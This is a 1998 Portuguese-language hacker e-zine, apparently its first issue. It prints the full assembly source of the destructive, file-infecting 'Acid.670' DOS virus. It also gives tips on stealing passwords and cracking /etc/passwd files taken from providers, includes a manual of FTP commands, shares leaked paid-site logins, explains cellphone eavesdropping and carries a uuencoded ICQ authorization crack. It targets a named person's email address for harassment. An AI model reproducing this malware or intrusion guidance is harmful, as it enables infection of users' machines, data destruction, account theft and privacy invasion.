                     MELHOR VISUALIZACAO NO WORDPAD
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<    InSaNiTy    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
/////////////////////////////No-00-Setembro/98\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

III  NN      NN  SSSSSSSSS    AAA    NN      NN  III  TTTTTTTT  YY      YY
III  NNN     NN  SS          AA AA   NNN     NN  III     TT      YY    YY
III  NN NN   NN  SS         AA   AA  NN NN   NN  III     TT       YY  YY
III  NN  NN  NN  SSSSSSSSS  AA   AA  NN  NN  NN  III     TT         YY
III  NN   NN NN  SSSSSSSSS  AAAAAAA  NN   NN NN  III     TT         YY
III  NN    NNNN         SS  AA   AA  NN    NNNN  III     TT         YY
III  NN     NNN  SSSSSSSSS  AA   AA  NN     NNN  III     TT         YY
              
            NAO CONFIE NA POLICIA, ELES SAO UMA RACA FILHA DA PUTA
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                    ++++++++++++++++++++++++++++++++++++
+++++++++++++++++++ http://members.xoom.com/insanityzine +++++++++++++++++++
                    ++++++++++++++++++++++++++++++++++++ 
     
    REVISTA MENSAL:TODA PRIMEIRA SEGUNDA-FEIRA DO MES NA NOSSA HOME PAGE

INDICE
******

1- INTRODUCAO ......................................dexter07        
2- VIRII ...........................................dexter07
3- ANARCHY .........................................WORMBOY
4- XXX PASSWORDS ...................................dexter07
5- PHREAKING .......................................DeProgram (UHF Zine)
6- HACKING .........................................dexter07
7- UUEncode ........................................dexter07
8- FRASES ..........................................dexter07
9- BONUS ...........................................dexter07
10- MEMBERS 

OBS.:O autor(es) nao se responsabiliza por nada que voce venha a fazer 
depois de ler esse zine
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

**************
*1-INTRODUCAO*
**************
Por essa ser a primeira edicao da zine e eu ainda ter de escreve-la quase 
toda sozinho,vai ter muita besteira. 
Essa zine eh dedicada a todos begginers,newbies,larvas ou como queiram 
chamar, que querem aprender mais sobre o mundo underground dos pcs, se voce 
soh quer as coisas prontas, sem ter que fazer nada pra conseguir vah se 
foder porque voce eh um lammah, agora se voce quer aprender sobre o assunto
vai atras, e nao quer tudo mastigado, voce tem grandes possibilidades de se
tornar alguem no mundo underground dos pcs. Ninguem que tah escrevendo essa 
zine se considera um hacker apenas estamos escrevendo coisas que sabemos e 
que queremos que voces aprendam tambem, porque pra nos do mundo underground 
dos pcs para nos tornarmos alguem, temos que nos unir e sermos um movimento 
soh e nao ficarmos todos separados e comtinuarmos sendo a mesma coisa que 
somos, nos temos que crescer.
Soh pra lembrar como essa eh a primeira zine,eu vou fazer aqui uma pequena 
descricao das sessoes da zine:
1-Introducao- Esse besterol que voce tah lendo e que soh serve pra encher a 
zine.
2-Virii- Para programadores iniciantes que desejam aprender programacao de 
virus.
3-Anarchy- Algumas ideias pra voce fazer quando estah naquele dia de furia e 
tem q sacanear alguem.
4-XXX Passwords- Todo mes 7 passwords para sites pornos pagos divididos em 7 
categorias.
5-Phreaking- Tecnicas usadas para se conseguir coisas relacionadas a 
telefones como grampo telefonico, ligacoes de graca, etc..
6-Hacking- Dedicada a todos que querem aprender a arte do hacking, com dicas,
 tecnicas usadas, etc..
7-Frases- Todo mes 3 frases pra voce philosophar um pouco. 
8-UUEncode- Sempre um programa util em UUE pra voce usar.
9-Bonus- Sempre algo util como exploits, faqs, programinhas pra pegar 
lammers, serial numbers, senhas de provedores, etc..
10-Members- Pra saber quem edita essa zine, como falar com nos, etc..

*********
*2-VIRII*
*********
Nao entendo muito de virii por isso vou esperar alguem que saiba mais se 
apresentar pra ser editor da parte de virii. Jah que nao entendo muito mesmo
nao vou falar demais e soh vou publicar um codigo fonte em assembler de um 
virus jah pronto que nesse mes eh o "Acid.670" e foi feito por Evil Avatar.

--------------------------------corte aqui----------------------------------

.model tiny                             ;if you are lost already, you
.code                                   ;shouldn't be playing with viruses
org 0h

v_mem   equ (v_end-Acid+15)/16+1
v_word  equ (v_end-Acid)/2
id      equ 0a0ffh
v_file  equ (heap-Acid)

Acid:   call next
next:   pop bp
        sub bp, offset next             ;get delta offset

        mov ax, id
        sub bx, bx
        int 21h                         ;residentcy install check

        push es                         ;save PSP segment
        cmp bx, id                      ;are we here already?
        je check                        ;then exit

        mov ax, 3521h
        int 21h                         ;get int 21h vector
        mov word ptr [bp+save_21], bx
        mov word ptr [bp+save_21+2], es ;save int 21h vector

        mov ax, ds                      ;ds=PSP segment
        dec ax                          ;ax=MCB segment
        mov es, ax                      ;es=MCB segment
        cmp byte ptr es:[0], 'Z'        ;is it last MCB in chain?
        jne done                        ;no? exit
        sub word ptr es:[3], v_mem      ;allocate memory for virus
        sub word ptr es:[12h], v_mem    ;change TOM field in PSP
        mov ax, es:[12h]                ;find virus MCB segment
        mov es, ax                      ;es=virus MCB segment
        mov byte ptr es:[0], 'Z'        ;mark as last in MCB chain
        mov word ptr es:[1], 8          ;DOS now owns this
        mov word ptr es:[3], v_mem-1    ;set the size of segment
        inc ax                          ;ax=virus segment
        mov es, ax                      ;es=virus segment
        lea si, [bp+offset Acid]        ;start of virus
        sub di, di                      ;clear di
        mov cx, v_word                  ;virus size in words
        rep movsw                       ;copy virus to TOM

        push es
        pop ds                          ;put segment in ds
        mov ax, 2521h
        mov dx, offset int21
        int 21h                         ;set new int 21h vector in virus

check:  pop es                          ;restore es
        mov ah, 2ah
        int 21h                         ;get date
        cmp al, 1                       ;is it a monday?
        je destroy                      ;chew a sector
return:        
        cmp sp, 0abcdh                  ;is this an .exe file?
        jne done                        ;no? restore com stuff
        push es
        pop ds
        mov ax, es                      ;ax=PSP segment
        add ax, 10h                     ;adjust for PSP size
        add word ptr cs:[bp+comsave+2], ax ;set up cs
        add ax, word ptr cs:[bp+_ss_sp+2]  ;set up ss
        cli                             ;clear ints for stack manipulation
        mov ss, ax                      ;set ss
        mov sp, word ptr [bp+_ss_sp]    ;set sp
        sti                             ;restore ints
        db 0eah                         ;jump to old program
comsave db 0cdh, 20h, 0, 0

destroy:
        in al, 40h
        xchg al, ah
        in al, 40h                      ;get a random number
        xchg ax, dx
        mov cx, 1
        mov ax, 2
        int 26h                         ;and crunch that sector
        jmp return                      ;return to program

done:   push cs
        pop ds                          ;ds=cs
        push cs
        pop es                          ;es=cs

        mov di, 100h                    ;beginning of program
        push di                         ;for later return
        lea si, [bp+comsave]            ;first 3 bytes of program
        movsb
        movsw                           ;restore first 3 bytes

        ret                             ;return to program

int21:  cmp ax, id                      ;is this an installation check?
        je vcheck                       ;yes? tell 'em we're here
        push bx
        push cx
        push si
        push di
        push es
        push dx
        push ds                         ;save regs
        push ax
        cmp ah, 4bh                     ;hmm..execute huh? well, they
        je v_com                        ;did it to themselves
        cmp ah, 11h                     ;dir check
        je dirfix
        cmp ah, 12h                     ;dir check
        je dirfix
        pop ax
        pop ds
        pop dx
intpop: pop es
        pop di
        pop si
        pop cx
        pop bx                          ;restore regs
        jmp dword ptr cs:[save_21]      ;jump to DOS int 21h

vcheck: xchg ax, bx                     ;put ID into bx
        iret

dirfix: pushf
        call dword ptr cs:save_21       ;simulate int 21h call

        mov word ptr cs:[buffer], ax    ;save return
        push ax
        push si
        pushf                           ;save the new flags
        mov si, sp
        mov ax, [si]                    ;get new flags
        mov [si+10], ax                 ;put them where old flags are
        popf
        pop si
        pop ax

        test al, al                     ;see if file is found
        jnz nofile                      ;if none, exit

        mov ah, 51h
        int 21h                         ;get PSP segment
        mov es, bx
        cmp bx, es:[16h]                ;is it DOS?
        jne nofile                      ;no? avoid CHKDSK
        
        mov ah, 2fh
        int 21h                         ;get DTA in es:bx

        cmp byte ptr ds:[bx], -1        ;is it extended FCB?
        jne cont
        add bx, 7                       ;then add 7 to pointer
cont:   mov cx, ds:[bx+17h]             ;get time
        and cx, 1fh                     ;get seconds
        cmp cx, 1fh                     ;if not 62 secs then exit
        jne nofile

        sub ds:[bx+1dh], v_file
        sbb word ptr ds:[bx+1fh], 0     ;subtract virus size
        
nofile: pop ax                          ;if you can read this
        pop ds                          ;you don't need glasses
        pop dx
        pop es
        pop di
        pop si
        pop cx
        pop bx                          ;restore regs
        mov ax, word ptr cs:[buffer]    ;restore return type
        iret

v_com:  push ds
        push dx
        push cs
        pop ds
        mov ax, 3524h
        int 21h                         ;get critical error handler
        mov word ptr [save_24], bx
        mov word ptr [save_24+2], es    ;save it
        mov ax, 2524h
        mov dx, offset int24            
        int 21h                         ;set new critical error handler
        pop dx
        pop ds        
        push cs
        pop es

        mov ax, 4300h
        int 21h                         ;get attributes of file
        push cx                         ;save attributes
        mov ax, 4301h
        sub cx, cx
        int 21h                         ;clear attributes
        jc booster

        mov ax, 3d02h
        int 21h                         ;open file
        xchg ax, bx                     ;put handle in bx

        push cs
        pop ds                          ;ds=cs for all references
        jmp past_booster
booster:                                ;i hate having to use these
        pop cx
        pop ax
        pop ds
        pop dx
        push ax
        jmp bad_file
text    db 'KW'                         ;you'll never guess
past_booster:
        mov ah, 3fh
        mov cx, 1ah
        mov dx, offset buffer
        int 21h                         ;read first 1ah bytes

        mov ax, 5700h
        int 21h                         ;get file time and date
        mov word ptr [time], cx         ;save time
        mov word ptr [date], dx         ;save date
        and cx, 1fh                     ;get seconds
        cmp cx, 1fh                     ;is it 62 secs?
        je close                        ;already infected

        cmp word ptr [buffer], 'ZM'
        je v_exe
        cmp word ptr [buffer], 'MZ'
        je v_exe                        ;if .exe file then infect it

        mov si, offset buffer
        mov di, offset comsave
        movsb
        movsw                           ;move combytes to comsave
        mov ax, 4202h
        sub cx, cx
        cwd
        int 21h                         ;move pointer to EOF

        sub ax, 3
        mov byte ptr [buffer], 0e9h
        mov word ptr [buffer+1], ax     ;set up jump

write_virus:
        mov ah, 40h
        mov cx, v_file
        cwd
        int 21h                         ;write virus to EOF
        mov ax, 4200h
        sub cx, cx
        int 21h                         ;go to beginning of file
        mov ah, 40h
        mov cx, 1ah                     ;restore buffer size
        mov dx, offset buffer
        int 21h                         ;write header or jump

sign:   mov ax, 5701h
        mov cx, word ptr [time]         ;get time
        or cx, 1fh                      ;set seconds to 62
        mov dx, word ptr [date]         ;get date
        int 21h                         ;set file time and date

close:  mov ah, 3eh
        int 21h                         ;close file

        pop cx                          ;get attributes
        pop ax
        pop ds
        pop dx                          ;get file name
        push ax
        mov ax, 4301h
        int 21h                         ;restore attributes
bad_file:        
        push ds
        push dx
        mov ax, 2524h
        lds dx, dword ptr cs:[save_24]
        int 21h                         ;restore old int 24h
        pop dx
        pop ds
        pop ax
        jmp intpop                      ;return to caller

v_exe:  push bx
        les ax, dword ptr [buffer+14h]  ;get cs:ip in es:ax
        mov word ptr [comsave], ax      ;save ip
        mov word ptr [comsave+2], es    ;save cs
        
        les ax, dword ptr [buffer+0eh]  ;get ss:sp
        mov word ptr [_ss_sp], es       ;save sp
        mov word ptr [_ss_sp+2], ax     ;save ss
        
        add word ptr [buffer+0ah], v_mem   ;set new minimum memory requested
        
        mov ax, word ptr [buffer+8]     ;get header size
        mov cl, 10h
        mul cl                          ;change to bytes
        push ax                         ;save it

        mov ax, 4202h
        sub cx, cx
        cwd                             ;move file pointer to EOF
        int 21h                         ;and get file size in dx:ax
        
        pop cx                          ;restore header size
        push dx
        push ax                         ;save file size
        
        sub ax, cx
        sbb dx, 0                       ;get new cs:ip
        
        mov word ptr [buffer+16h], dx   ;save cs
        mov word ptr [buffer+14h], ax   ;save ip
        
        mov word ptr [buffer+0eh], dx   ;save ss
        mov word ptr [buffer+10h], 0abcdh  ;save sp
        
        pop ax
        pop dx                          ;get file size
        add ax, (v_end-Acid)
        adc dx, 0                       ;add virus size
        
        mov cx, 200h                    
        div cx                          ;convert to pages
        push ax                         ;save it
        or dx, dx                       ;is there a remainder?
        je remainder                    ;yes? increment number of pages
        inc ax
remainder:        
        mov word ptr [buffer+4], ax     ;save number of pages
        pop ax
        and ah, 1
        mov word ptr [buffer+2], ax     ;file size MOD 512
        pop bx
        jmp write_virus

int24:  mov al, 3                       ;fail the call
        iret

vname   db '[Binary Acid]', 0           ;do you need this explained???
author  db '(c) 1994 Evil Avatar', 0    ;this is me (duh!)
_ss_sp  dd ?                            ;stack pointer
heap:                                   ;variables
save_21 dd ?                            ;int 21h entry
save_24 dd ?                            ;int 24h entry
time    dw ?                            ;file time
date    dw ?                            ;file date
buffer  db 1ah dup (?)                  ;buffer
v_end:
end Acid

---------------------------------corte aqui---------------------------------
***********
*3-ANARCHY*
***********
Esse mes como eh a primeira zine vamos soh publicar um pouco da historia do 
anarquismo mas na proxima edicao vamos publicar a pratica, hehe

Anarquia eh uma Doutrina politica segundo a qual os governos devem ser 
abolidos e os Estados substituidos pela cooperacao voluntaria de individuos 
e grupos, eliminando-se assim as injusticas sociais e o autoritarismo 
politico. Os Anarquistas proscrevem a propriedade privada, mas diferem dos 
socialistas por acreditarem que qualquer forma de governo tende a instituir 
a opressao politica e social. Embora algumas correntes sejam adeptas de 
violencia (Anarquista Punk) como o unico meio de derrubar as formas do 
governo existentes, ha varias tendencias que propeem a construcao por vias 
pacificas, de uma sociedade onde todos os individuos tenham igualdade de 
direitos. Na historia moderna, o anarquismo surge em esboco em certos 
movimentos dissidentes de Reforma, como o dos ANABATISTAS. No comeco do 
seculo XIX, o romancista ingles Willian Godwin (1756-1836) e o filosofo 
alemao Max Stirner (Johann Kaspar Schmidt 1806-1856) foram os primeiros a 
sistematizar ideias Anarquistas. O primeiro grande teorico da doutrina foi 
Proudhon (1809-1865), que influenciou movimentos operarios na Franca, e o 
primeiro grande lider foi o russo Bakunin (1814-1876), cuja propaganda de 
destruicao violenta das ordens estabelecidas teve ampla aceitacao. Discipulo
de Bakunin, o principe Kropotkin optou por um Anarquismo pacifico, 
influenciando doutrinas de nao violencia como as de Tolstoi e Ghandi. A 
doutrina de violencia de Bakunin, combatida por Marx, foi posta em pratica 
por grupos de varios paises, como, Franca, Espanha, Italia e EUA, 
desenbocando em atos terroristas como o assasinato do Rei Umberto (1844-1900)
na Italia e do presidente William McKinley (1843-1901) nos EUA. 
( MORTE AOS PORCOS AMERICANOS ) 
     No comeco do sec. XX, o frances Georges Sorel (1847-1922), integrante do
grupo dos Anarco-Sindicalistas, defendia a greve geral revolucionaria como 
unico meio de destruir a atual sociedade.
Suas ideias influenciaram organizacoes em diversos paises, notadamente 
Espanha, Franca e Italia. As unicas experiencias de administracao Anarquista
em larga escala ocorreram na Espanha e Ucrania durante a
guerra civil que se seguiu a Revolucao Russa. Os camponeses ucranianos, 
liderados por Nestor Makhno, dominaram uma vasta area e procuraram 
organizar-se de forma libertaria. No entanto, em poucos meses tiveram que 
submeter-se a autoridade do governo centralizado dos comunistas. Na Espanha, 
durante a revolucao de 1936, os camponeses e operarios Anarquistas tomaram as
terras e fabricas para administra-las autonomamente. Perderam-nas, entretanto
para o Estado republicano. Apesar de ter pequena influencia politica em 
nossos dias, o Anarquismo inspirou manifestacoes recentes, como certos 
movimentos estudantis na Europa e America. 
     No Brasil, o Anarquismo constitui movimentos em Sao Paulo e Rio de 
Janeiro, no comeco do seculo XX, imigrantes italianos, espanhois e 
portugueses encontraram adeptos como Jose Oiticica (Oliveira,
MG, 1882 - Rio de Janeiro, RJ, 1957) e Lima Barreto e chegaram a publicar 
semanarios e revistas. Nos fins do governo de Pedro II, Anarquistas italianos
fundaram no Parana a Colonia Cecilia, organizada
segundo suas ideias, que teve, contudo, curta duracao. Embora nao tenha 
durado muito tempo e nao tenha atingido maiores proporcoes, o Anarquismo 
brasileiro chegou a articular grandes greves, como a
greve geral de Sao Paulo de 1917. Foi com elementos vindos do Anarquismo, 
como Astrojildo Pereira (Rio Bonito, RJ, 1890 - Rio de Janeiro, RJ, 1956), 
que se fundou o movimento comunista brasileiro.

                   FODAM-SE AS LEIS, EU QUERO UM MUNDO LIVRE!

ATENCAO! SE PREPARE, NA PROXIMA EDICAO:
Bombas
Explosivos
Como Fuder Com Festas


*****************
*4-XXX PASSWORDS*
*****************
Atencao: como esses usernames e passwords sao conseguidos de graca e as vezes
os servidores se dao conta disso e deletam essa conta, esses passwords foram 
testados no dia 31/08/98 e se nao funcionam mais nao eh porque sao inventados
eh porque o servidor os retira.

Url: http://www.celeb-net.com/member/
Username: dew  
Password: poir 

Url: http://www.webvirgins.com/pass.html
Username: sexsite 
Password: sexsite

Url: http://members.pussyarchive.com/
Username: sexyteen
Password: porno

Url: http://www.perfect-ass.com/getem/ulthm.htm
Username: user
Password: password

Url: http://members.campusbabes.com/
Username: jimbo
Password: golf


*************
*5-PHREAKING*
*************
TEXTO RETIRADO Do "The Brasilian Phreakers Journal" No-001  
TEXTO ESCRITO POR: DeProgram

Nos sempre ouvimos falar sobre a capacidade de escutas celulares por
meio de radios mais capacitados. E acredito q todos nos sabemos dos passos
ridiculos usados pelas companias como motorola para tentar impedir q estes 
tipos de 'espionagem' sejam capacitadas em seus celulares , mas pelo visto
estao se tornando cada vez mais dificil impedir este crescimento PhReaKiNg 
no mundo . Mas o q parece impossivel e dificil esta se tornando facil e 
muito legal de se fazer .
        Primeiro o q vc precisa eh de uma tv que tenha a opcao UHF nela (ou 
seja,q esta tv possa acessar os canais UHF), istro inclui VCRs . Os 
canais de 14 a 83 sao nas bandas UHF . Pense nisto : todos estes canais 
podem ser usados pela estacao de tv , o q permitiria o procedimento do 
scaneamento . Mas existe um problema , as bandas UHF q eu lhe disse , nao 
existem mais para tvs , hoje em dia elas sao usadas para frequencias 
celulares e SM (Servicos Moveis).
	Em tvs antigas existe um segundo sistema q usam UHF : Vc coloca o seu
VHF em "U" e depois procure as estacoes em UHF , isto ira te colocar em 
todas as estacoes usadas .Se vc esta usando VCR somente tenha cuidado na 
hora de checar se voce esta no modo TV ou CATV existe uma certa diferenca 
nisto.
        Mas quando vc esta na banda UHF , e comeca a passar de estacoes para
estacoes vc nao ira pegar nada , pq a maioria das pessoas q usam cabos para
se conectar com a tv , pois existe um diferenca entre os canais UHF de 
celular , e os UHF de cabo , q sao (eram) desifnados para o uso do celular.
        Olhe em volta do canal 80 ateh 83.Quando vc nao ouvir uma pessoa 
falando vc ira ouvir uma puta barulhada . Eu acho q deve ser a ERB tentando
segurar o canal aberto , ja q a sua conexao eh meia forcada .Para q este tipo
de imprevisto nao acontece , procure fazer um senso de a q horas as pessoas
usam mais celulares , tente das 10 ao 12 , das 15 as 19 , e das 20 ateh 24 .
        Se vc realmente nunca pegar uma coversa , eh pq vc nao tem o aparelho
de tv velho , vc usa um novo , q eh produzido pelas fabricas especialmente 
para q este tipo de coisa nao ocorra . Mas existem boatos de q se pode mudar
esta configura?'o , se nos da Phreak Journal receber alguma informacao elas
serao passadas a vc com o maior pazer .
        De qualquer modo , se a sua TV um nova , use a aquela tv do seu avo
q vc guardou pq era feita com uma madeira especial (heh).Sem brincadeira , 
quando eu testei isto , eu usei uma TV tao merda q nos tivemos q colocar
uns durex e colas nela para funcionar .Tvs preto e brancos sao perfeitas
para isto , procure uma em uma loja de antiguidades .Mas nao eh um tv preto e
branca nova , e sim antiga .
        A proxima coisa para se fazer eh arrume uma ANTENA 
        De uma olhada atras do seu aparelho de TV , e vc provevelmente ira
achar dois pontos marcados com UHF (e se vc continuar olhando ira achar uma
com VHF). Vc ira plugar sua antena de ondas celulares na parte q diz UHF .
        Se vc nao tiver antena compre uma de 800Mhz q serve bem para o seu
trabalho . Este tipo de antenas se vc achar eh uma beleza pq vc ira pegar
somente as ondas q te interessam para o scaneiamento .
	Vc tb pode usar uma segunda tv para criar um RFD e escutar ainda mais
canais . 
        Mas tarde talvez na proxima edicao eu coloque como se faz para 
alterar este tipo de aparelhos novos , para poderem captar as frequencias 
UHFs de celulares .
	[DeProgram]


***********
*6-HACKING*
***********
Como pegar senhas de alguem

Existem varias formas de voce pegar senhas de alguem, algumas mais faceis e 
algumas mais dificeis, provavelmente a mais facil e vc ficar atras do 
computador do carinha e quando ele tiver digitando a senha voce finge que 
nao esta vendo, e pega a senha dele existem tambem programas que gravam tudo 
o que eh digitado no computador, essa jah eh mais dificil pois se seu amigo 
ve aquela janelinha aberta e acha que nao eh nada, provavelmente vai fecha-
la depois de ve-la, existe outra forma tambem, que eh voce conhecer bem a 
pessoa e tentar coisas sobre ela como nome do cachorro, telefone,data de 
nascimento, iniciais (por exemplo: nome:lammer da silva iniciais:lds) 
existe tambem o metodo de pegar arquivos que contenham senhas como por 
exemplo os arquivos com extensao "pwl" se o carinha usa o ruindows ou 
arquivos com extensao "ini" que alguns programas usam pra deixar as senhas 
lah como por exemplo o trumpet winsock, pegasus mail, e outros mais.
Hah tambem o metodo mais dificil mais com certeza um dos mais eficazes que 
eh voce entrando no provedor e pegando o arquivo de senhas, se o computador 
usar unix, linux ou qualquer outro sistema compativel, os arquivos de senhas 
geralmente ficam no diretorio "/etc" e geralmente com o nome "passwd", se 
esse arquivo for mais ou menos assim:

rocket:wemfRw0Zx3vwY:0:0::/etc
logan:ew0yxnnV454xA:0:0::/usr

voce tem muita mas muita sorte mesmo pois esse arquivo eh soh criptografado 
com o metodo comum e eu se fosse voce correria pela internet pra pegar logo 
um desencriptografador como o "cracker jack" que eu acho que eh o melhor pra
descriptografar senhas somente criptografadas com o metodo comum.
Mas se seu arquivo eh mais ou menos assim:

root:*:0:0:::
bin:*:1:1:::
operator:*:11:0:::
ftp:*:14:50:::
nobody:*:99:99:::

ou assim:

root:X:0:0:::
bin:X:1:1:::
operator:X:11:0:::
ftp:X:14:50:::
nobody:X:99:99:::

jah vai ficar um pouco mais complicado porque esse tipo de senha eh 
criptografada com o metodo de shadow e se voce usa o ruindows acho dificil 
voce conseguir descriptografa-la pois eu soh conheco programas que 
descriptografam esse tipo de senha pra unix, entao se voce usa soh o 
ruindows, nao vai adiantar muito nao pq voce vai precisar de algum sistema 
compativel com o linux pra descriptografar esse tipo de senha, mas se voce 
soh usa o ruindows, aconselho voce a pegar esse arquivo em todos os 
provedores que conseguir e depois olhar pra ver se eh com shadow ou sem, 
como esse processo eh feito por ftp, vou dar uma pequena descricao dos 
comandos do ftp do m$-dos que eu acho que eh o melhor pra esse sistema 
operacional, se voce nao sabe como roda-lo, basta ir no prompt do m$-dos e
digitar ftp e se aparecer a linha "ftp >" ele existe mas se nao aparecer me 
desculpe mas voce nao o tem, vou parar de falar baboseira e vou escrever os 
comandos aqui em baixo:
             ***************************************************       
             *MANUAL DE COMANDOS PARA FTP DO m$-DOS by dexter07*
             ***************************************************                       

* open- abrir uma conexao 
  ex: ftp >open ftp.lammah.com.br
* !- deixa o ftp funcionando enquanto voce usa o prompt pra outra coisa, pra
  sair basta digitar exit
  ex: ftp > !
      Micro$oft (R) RuWindows 95
      (c) copyright micro$oft corp 1981-1995
      c:\ruindows>exit
      ftp >
* cd- mesma funcao que o cd do dos
  ex: ftp >cd pub
      250 Directory changed to /pub
* dir- mesma funcao que o dir do dos
  ex: ftp >dir
      200 PORT Command successful.
      150 Opening ASCII mode data connection to /bin/ls.
      drwxr-xr-x   1 user     group          0 May 12 13:55 pub
      drwxr-xr-x   1 user     group          0 May 12 13:55 bin
      drwxr-xr-x   1 user     group          0 May 12 13:55 etc
      226 Transfer Complete
      314 bytes received in 0.33 seconds (2.22 Kbytes/sec)
      ftp >
* delete- mesma funcao que o delete do dos
  ex: ftp >delete zine01.txt
      250 DELE command successful.
      ftp > 
* user- mudar o usuario, por exemplo se voce tiver logado como um usuario 
comum e derepente veio uma visao na sua cabeca e voce agora sabe a senha do 
root
  ex: ftp >user
      (username) root
      331 User name okay, need password.
      Password:
      230 User logged in, proceed.
      ftp >
* ? ou help- mostra os comando que podem ser utilizados
  ex: ftp >help
      Command may be abbreviated. Commands are:
  
aqui ele mostra os comandos todos que voce pode usar soh que eu nao vou 
escrever porque eh uma lista bem grande

* disconnect- desconecta do servidor
  ex: ftp >disconnect
      221 Good Bye
* bye- fecha o ftp do dos e se voce estiver conectado, te desconecta
  ex: ftp >bye
      221 Good Bye
      c:\ruindows>
* get- pegar arquivo do servidor
  ex: ftp >get passwd
      200 PORT Command successful
      150 Opening ASCII mode data connection for passwd (84 Bytes).
      226 Transfer Complete
      84 Bytes received in 0.05 seconds (1.68 Kbytes/sec)
      ftp >
* lcd- mostra o diretorio atual do seu computador, ou seja quando voce der 
um get, todos os arquivos que voce pegar vao pra esse diretorio
  ex: ftp >lcd
      Local directory now C:\ruindows
      ftp >
e para mudar esse diretorio basta digitar lcd e o diretorio que voce quiser
  ex: ftp >lcd c:\fotos
      Local directory now C:\fotos
      ftp >
* pwd- mostra o diretorio que voce tah dentro do servidor
  ex: ftp >pwd
      257 "/etc" is current directory.
      ftp >
* send- mandar arquivo pro servidor
  ex: ftp >send c:\zines\zine01.txt
      150 Opening ASCII mode data connection for zine01.txt  
      226 Transfer Complete.
      947 bytes sent in 0.00 seconds (947000.00 Kbytes/sec)
* type- mostra o tipo de conexao usada pra pegar dados
  ex: ftp >type
      Using ascii mode to transfer files. 
* prompt- tira aquelas mensagens como:
      226 Transfer Complete 
      947 bytes sent in 0.00 seconds (947000.00 Kbytes/sec)
nao serve pra muita coisa
* ls- lista os diretorios e arquivos um em cima do outro
  ex: ftp >ls
      200 PORT Command successful.
      150 Openning ASCII mode data connection for /bin/ls.
      etc
      pub
      bin
      fotos
      textos
      226 Transfer Complete
      60 Bytes received in 0.06 second (1.00 Kbytes/sec)
* ascii- muda o tipo de recebimento de dados pra padrao ascii
  ex: ftp >ascii
      200 Type set to A
      ftp >
* binary- muda o tipo de recebimento de dados pra padrao binario
  ex: ftp >binary
      200 Type set to I
      ftp >
* bell- Se estiver ativado toca um bip quando uma operacao se completa
  ex: ftp >bell
      Bell mode on (ligado)
      ftp >
* close- mesma coisa que o desconnect, te desconecta do servidor mas o ftp 
fica aberto
  ex: ftp >close
      221 Good Bye
      ftp >
* rename- mesma funcao que o rename do dos
  ex: ftp >rename passwd pass
      350 File exists, ready for destination name
      250 RNTO command successful.
      ftp >
* quit- mesma coisa que o bye, te desconecta e fecha o ftp
   ex:  ftp >quit
        221 Good Bye
        c:\ruindows>
* status- mostra o seu status no servidor
   ex: ftp >status
       Connected to ftp.lammah.com.br
       Type ascii; Verbose: On; Bell: Off; Prompting: On; Globbing: On;
       Debugging: Off; Hash mark printing: Off
       ftp >
* append- inserir um aqruivo dentro do outro, por exemplo, se o arquivo 
c:\pass.txt contem o seguinte texto:
       reginato@matrix.com.br maior lammah que eu conheco 
obs.: isso eh verdade, podem foder com ele pq ele eh um lammah de primeira
e tem um arquivo no ftp que se chama lammah.txt e tem o seguinte texto:
       meu nome eh joao
e voce faz esse comando:
   ex: ftp >append
       (local file)c:\pass.txt
       (remote file)lammah.txt
depois de fazer isso o arquivo lammah.txt que estah dentro do servidor vai 
ficar assim:
      meu nome eh joao 
      reginato@matrix.com.br maior lammah que eu conheco 
entendeu?
se nao entendeu se foda
* remotehelp- mostra qual o servidor ftp que o provedor tah usando, quais os 
comandos que ele aceita, etc..
* mkdir- cria diretorio
   ex: ftp >mkdir fotos
       ---->XMKD fotos
       257 "/fotos" directory created.
* rmdir- deleta diretorio
   ex: ftp >rmdir fotos
       250 RMD command successful.
* recv- receber arquivo 
   ex: ftp >recv zine01 zine22.txt
ele copia o arquivo zine01 pro seu computador como zine22.txt
* debug- soh mostra detalhes do que voce faz
   ex: ftp >debug
       Debugging On.
       ftp >get pass
       ---> Port 251,251,22,2,4,21
       200 Port command successful.
* mls- mover arquivo do servidor pro seu computador
   ex: ftp >mls
       (remote-files) texto.txt
       (local-file) texto2.txt
       output to local-file: texto2.txt? y
 ele moveu o arquivo texto.txt para seu computador como texto2.txt

com esses comando voce jah vai conseguir se virar bem no ftp do m$-dos, se 
quiser saber mais, procure porque eu nao vou lhe dizer. 
 

     
************
*7-UUEncode*
************
Esse mes eh o ICQCRACK, que serve pra voce adicionar carinhas na sua lista 
de contatos do icq sem pedir autorizacao pra ele se tiver que pedir,eu jah 
testei no meu que eh a versao 98a Beta com dll 1.03 funcionou, nao garanto 
que vai funcionar no seu, pra rodar basta por no mesmo diretorio que o 
icq.exe e rodar, nao se esqueca de fechar o icq.exe se vc tiver usando-o.


--------------------------------corte aqui----------------------------------


_=_ 
_=_ Part 001 of 001 of file pcicq.zip
_=_ 

begin 666 pcicq.zip
M4$L#!!0````(`$"4KB0M"KBFV@@``&@E```&````4$,N3D9/K9E;<]I(%H#?
M7>77?3ZI?<G4),13-:E*_":#`L08O$(D<5+>K08:Z$*HB21"[,J/LIE]GZE:
M_L0N,OR3U)[3DD!<%"2'8QNLOGQ];GV1!)`DOC^;37Q_1\W=\=&.4A)_,EDL
M\'NQF`1=OP-=!I#[H`FV\3<`T2#^`JMQV-D,OV"!PZ_:8-4$>0L25"S.\!=1
M"QJ-U)[,0B'*#.ONZ.?N_GX25BD^5JTH\X?56,18A%!LC%U@3BQ_6:L*ET.@
MU2MM%DNE_8#AX\C(G]'8#S!;1-6(G)$.H4QFZUY9A'_*(T%1."R$V$`3U'L>
M*(,#3.[O[\C6>(R^!Q`_;$,=9N$5]0[U601H^D_1,(3DS'BHR+*%<N`DM"5R
M]&2FS"1#E3M"?1<43XR[O^8@TM=7Q@2DAY4S%Q2I(%J!8U50_,ELHFKF:Q3J
